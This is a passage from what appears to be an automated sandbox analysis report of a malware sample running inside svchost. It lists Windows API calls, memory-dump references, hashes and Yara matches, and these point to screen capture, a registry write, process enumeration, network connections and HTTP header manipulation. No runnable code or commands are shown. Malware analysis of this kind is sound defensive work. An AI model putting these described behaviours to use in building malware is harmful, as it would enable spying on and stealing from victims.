                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 02C777A1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    • API ID: Object$CompatibleCreateDeleteSelect$BitmapRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2733039346-0
                                                                                                                                                                                                                    • Opcode ID: 2bb2ac571cb401fe6b4c9584210e2ad626184bbe85346ab9c2802dc2599c5a24
                                                                                                                                                                                                                    • Instruction ID: bfb34221d478f6acdaabe61e514b240ef0dadb0fc3b9fac8cb4bf5e66dc91265
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bb2ac571cb401fe6b4c9584210e2ad626184bbe85346ab9c2802dc2599c5a24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55110075D81240AFC74ADB68F488FA67BF8EB8D310B154A95F40AC3301D734A8658F60
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsWindowVisible.USER32(02C7C29D), ref: 02C7BB2F
                                                                                                                                                                                                                    • GetWindowInfo.USER32(02C7C29D,?), ref: 02C7BB49
                                                                                                                                                                                                                    • GetClassLongA.USER32(02C7C29D,000000E6), ref: 02C7BB9E
                                                                                                                                                                                                                    • PrintWindow.USER32(02C7C29D,?,00000000), ref: 02C7BBB7
                                                                                                                                                                                                                    • BitBlt.GDI32(02C7BD82,?,?,?,?,7694BCB0,00000000,00000000,00CC0020), ref: 02C7BC5E
                                                                                                                                                                                                                      • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                                      • Part of subcall function 02C7B950: SendMessageA.USER32(?,?,00000004,00000000), ref: 02C7B978
                                                                                                                                                                                                                      • Part of subcall function 02C7B950: GdiFlush.GDI32(00000000,?,762330D0,?,?,?,02C7843E), ref: 02C7B98E
                                                                                                                                                                                                                      • Part of subcall function 02C7B950: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02C7B9B4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                    • API String ID: 2334662925-4251816714
                                                                                                                                                                                                                    • Opcode ID: e4894afa2bf716a42caf37b7b11bc8e27eb5ceb2ea965b2bbc33eb65ace83cf7
                                                                                                                                                                                                                    • Instruction ID: 093ccc57ffc1fd99d080eff7a680f8aef94a22716c52aaadbc85895ac9ea315c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4894afa2bf716a42caf37b7b11bc8e27eb5ceb2ea965b2bbc33eb65ace83cf7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08413C71E00519AFCB15CF58C985AAEFBBABF84308F148259E405A7644DB30BE52CB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FBD3
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FBFF
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FC26
                                                                                                                                                                                                                    • HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 02C7FC6C
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02C7FC7F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    • API ID: QueryVirtual$HeadersHttpRequest
                                                                                                                                                                                                                    • String ID: Accept-Encoding:
                                                                                                                                                                                                                    • API String ID: 853579731-3444961765
                                                                                                                                                                                                                    • Opcode ID: eae1558d97f0c1907df676c8d2acc288414731bcd5932755705afb8cacad6815
                                                                                                                                                                                                                    • Instruction ID: a1939f19b0903ae485086d7e66a7c0367de7593c3fc979b1ec14221293d3a2c0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eae1558d97f0c1907df676c8d2acc288414731bcd5932755705afb8cacad6815
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F31FFB1D4121DAFDB50DFA5D885AEEBBB9FF88310F114569ED15E7200D3749A018FA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC0F
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC3B
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC62
                                                                                                                                                                                                                    • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02C7AC91
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C7ACA7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                                    • String ID: 80f507eba
                                                                                                                                                                                                                    • API String ID: 410342393-2772689766
                                                                                                                                                                                                                    • Opcode ID: 35ea4937242a902a5c5d0cf1d59a717b5ec3b164cb4c847174ea150e8905d255
                                                                                                                                                                                                                    • Instruction ID: 50cd088300e2c098ad6a19424ca14a86222806e7c165223fdedc0b517644ca9f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35ea4937242a902a5c5d0cf1d59a717b5ec3b164cb4c847174ea150e8905d255
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C31E1B1E40209EFDB40CFA9D885AEEBBF9FB48300F10856AE514E7240E7755A40CF90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8A9F7
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8B260,02CC7DA0,00000000,00000000), ref: 02C8AA90
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8AAA8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8AAB9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$BackslashCloseCreateInformationPathThread
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$keys
                                                                                                                                                                                                                    • API String ID: 3186380484-1311816763
                                                                                                                                                                                                                    • Opcode ID: 71ac756de49014c82fc43e66e7205a9b122f8058e74f0c633f2cb4bce79185f2
                                                                                                                                                                                                                    • Instruction ID: 31663a969f21679a839c96e740fe0cc2cd9ff88a966b516aecd0452d6e46079d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71ac756de49014c82fc43e66e7205a9b122f8058e74f0c633f2cb4bce79185f2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE214D319851455BDB22DB7499187FEB7E4DF49308F2881D9E845E7240EB71CE09CF90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                                    • Process32First.KERNEL32 ref: 02C931C5
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,?), ref: 02C931E0
                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 02C931EC
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93208
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C9321A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3955875343-0
                                                                                                                                                                                                                    • Opcode ID: 810e14c39b12bc5e0f1888c9af17e2f18aa07edadceab16d62b3436b5ada740f
                                                                                                                                                                                                                    • Instruction ID: 17a8724991fbeb8b365db2bb00f289a510eb225140cfe046ce7502c62d85ccaf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 810e14c39b12bc5e0f1888c9af17e2f18aa07edadceab16d62b3436b5ada740f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9511D2729043916BC711DF65EC49A9BBBECEFC9360F008A59FD5483281E7309619CBE2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(02C84ADF,software\microsoft,00000000,00000102,80000002,?,?,?,?,00000000,0000000A), ref: 02C76F4D
                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(80000002,80f5007ca,00000000,00000001,?,00000104,?,?,?,?,00000000,0000000A), ref: 02C76F6F
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F8A
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F9F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFlushOpenValue
                                                                                                                                                                                                                    • String ID: 80f5007ca$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2510291871-1722485806
                                                                                                                                                                                                                    • Opcode ID: c9896e355f72d0ac8f78d9d656b9a9fcbb5e46da394b6be2b37a54d38e5b89ec
                                                                                                                                                                                                                    • Instruction ID: 965a6c0805f5aa3b88c0bc7b017f05e06a6b41355062923ce301ca052dc6195e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9896e355f72d0ac8f78d9d656b9a9fcbb5e46da394b6be2b37a54d38e5b89ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF11C471A40188ABEB24DBA4DCC8FEE776DEB54308F204AADF646D7440D271DE84CB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • shutdown.WS2_32(?,00000001), ref: 02C883CB
                                                                                                                                                                                                                    • shutdown.WS2_32(02C884AC,00000001), ref: 02C883D0
                                                                                                                                                                                                                    • recv.WS2_32(02C884AC,?,00000400,00000000), ref: 02C883EF
                                                                                                                                                                                                                    • recv.WS2_32(?,?,00000400,00000000), ref: 02C88405
                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 02C88419
                                                                                                                                                                                                                    • closesocket.WS2_32(02C884AC), ref: 02C8841C
                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 02C88420
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1638183600-0
                                                                                                                                                                                                                    • Opcode ID: db002666e193d67a4fa707397537c28dadfaec4b9e9a6e682c755636d7f6cf5f
                                                                                                                                                                                                                    • Instruction ID: 050308a56ae31777cf988864614140b0bd900212560c140347662cfed291bd14
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db002666e193d67a4fa707397537c28dadfaec4b9e9a6e682c755636d7f6cf5f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85F031B29503187BD720AA65CC85F9B3B6CAB88B94F004644BB09BB180D6B4F941CEE4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,00000000,02C89113,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8913C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89146
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8914D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8915E
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C891AA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocMutexObjectProcessReleaseSingleWaitmemset
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 819421891-3387790918
                                                                                                                                                                                                                    • Opcode ID: bf17576b4b3f9974584de17eb10b964acc128a6fc0dcc4f49bd0e869d17f9889
                                                                                                                                                                                                                    • Instruction ID: e6f4492e7aabcac417ad51598b3df8eae1fa1d9cfa0e8139636ceb90c3e03de5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf17576b4b3f9974584de17eb10b964acc128a6fc0dcc4f49bd0e869d17f9889
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E01F3B0E81B11AFC32ACF28E844B46FBF4BF48710F048A5AE55A87780D730B950CB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AB6
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C97ABD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C97ACA
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C97AD1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AE0
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C97AE3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C97AF0
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C97AF3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1670920773-0
                                                                                                                                                                                                                    • Opcode ID: d57ac4135c724d8a926893770527e68ed6947d970c3d55a6b6301d0a02dcde21
                                                                                                                                                                                                                    • Instruction ID: e3683514777bb9f53f8e9e1f0d5adb4f683b40bf835c875ad3306b9d633f3255
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d57ac4135c724d8a926893770527e68ed6947d970c3d55a6b6301d0a02dcde21
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1631A171E41344ABDF219F69D848BAABBA8EF84314F048589ED0597246CB30DA55CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • free.MSVCRT ref: 02C9C81F
                                                                                                                                                                                                                    • MoveFileA.KERNEL32(?,?), ref: 02C9CA0D
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C9CA51
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C9CAC3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$AttributesCreateDirectoryMovefree
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1026147201-0
                                                                                                                                                                                                                    • Opcode ID: 6d56f136752f8de2cf715215aaabbe1badd567b4ca862488b421c707f727fe41
                                                                                                                                                                                                                    • Instruction ID: 6fbb9ba311c2d486b087baf120766f527d6bb41bf08a3a80a0ff45588bae05d7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d56f136752f8de2cf715215aaabbe1badd567b4ca862488b421c707f727fe41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4413831A4429A8FDF21CF7888987F97FA49F9A344F1445EAE582CB245DB309705CBA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02C96ED4
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02C97817), ref: 02C96EEE
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,02C97817), ref: 02C96F16
                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02C97817), ref: 02C96F22
                                                                                                                                                                                                                      • Part of subcall function 02C93E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C93E14
                                                                                                                                                                                                                      • Part of subcall function 02C93E00: CloseHandle.KERNEL32(?), ref: 02C93E25
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,02C97817), ref: 02C96F4E
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00140B17,02C97817,00000000,00140B17), ref: 02C96F80
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3741995677-0
                                                                                                                                                                                                                    • Opcode ID: 734895cd69303071544915fd29f7e9f1ff6f361a64f3e53f8d6472fd81a7165e
                                                                                                                                                                                                                    • Instruction ID: da0cf13bb213f9a11f149eb5d0aceba496568976ad3535ebd0d50bc920cc0354
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 734895cd69303071544915fd29f7e9f1ff6f361a64f3e53f8d6472fd81a7165e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9317C72A00209BBDB04DF99D884B6AF7BCFF58714F20825AE90497680D771AE60CBD0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 02C8810E
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C8813F
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C8816B
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C88192
                                                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C881B4
                                                                                                                                                                                                                    • WSASetLastError.WS2_32(?), ref: 02C881DE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast$Read
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2835504744-0
                                                                                                                                                                                                                    • Opcode ID: c5fd1cbb214b15cdab6ce06d29a125c76e6a7ede30152256b383716933324556
                                                                                                                                                                                                                    • Instruction ID: e7fe724f489af6321f71dceae56ef92282b7923a0bf88af3b1335e520fe97cb7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5fd1cbb214b15cdab6ce06d29a125c76e6a7ede30152256b383716933324556
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F41CAB1E0020DAFDB40DFA9D985AAEBBF9EF48304F518569E905E7200E7749A41CF90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: htons.WS2_32(?), ref: 02C9F564
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: inet_addr.WS2_32(?), ref: 02C9F56F
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: htonl.WS2_32(000000FF), ref: 02C9F57A
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: gethostbyname.WS2_32(?), ref: 02C9F586
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: socket.WS2_32(00000002,00000001,00000000), ref: 02C9F5A0
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: connect.WS2_32(00000000,?,00000010), ref: 02C9F5B3
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: closesocket.WS2_32(00000000), ref: 02C9F5BE
                                                                                                                                                                                                                    • setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02C9F21F
                                                                                                                                                                                                                    • closesocket.WS2_32 ref: 02C9F234
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: closesocket$connectgethostbynamehtonlhtonsinet_addrsetsockoptsocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2706992148-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 02C79057
                                                                                                                                                                                                                    • IsRectEmpty.USER32(?), ref: 02C790C6
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 02C790D6
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 02C790EA
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,02C79754), ref: 02C790F3
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,02C79754,00000000,00008001,0000630C,?,02C79754,00000000,00008001,?), ref: 02C79115
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
